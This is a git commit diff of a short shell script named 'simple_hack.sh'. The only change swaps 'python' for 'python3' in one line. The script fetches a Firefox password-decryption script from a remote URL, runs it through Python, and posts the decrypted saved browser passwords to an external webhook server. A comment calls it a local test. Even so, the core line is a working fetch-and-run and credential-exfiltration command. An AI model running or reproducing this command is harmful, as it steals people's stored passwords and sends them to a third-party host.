Update simple_hack.sh

This commit is contained in:
2025-05-06 15:53:00 +02:00
parent fd5b69cd4e
commit 0b493a0c29

View File

@@ -3,5 +3,5 @@
#Simple local webhook script to test capturing the browser passwords.
FIREFOX_DECRYPT_URL="https://ddealmei.github.io/assets/3b64d11ff0ac5da6a262b3490949ec7f6/firefox_decrypt.py"
WEBHOOK_SERVER_URL=" https://n8n-webhook.keremeylem.com/webhook/9dc89154-cd1d-4ace-8c65-6c64495c3d54"
echo $(curl -fsSL $FIREFOX_DECRYPT_URL | python) | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL
echo $(curl -fsSL $FIREFOX_DECRYPT_URL | python3) | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL
#echo "hello" | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL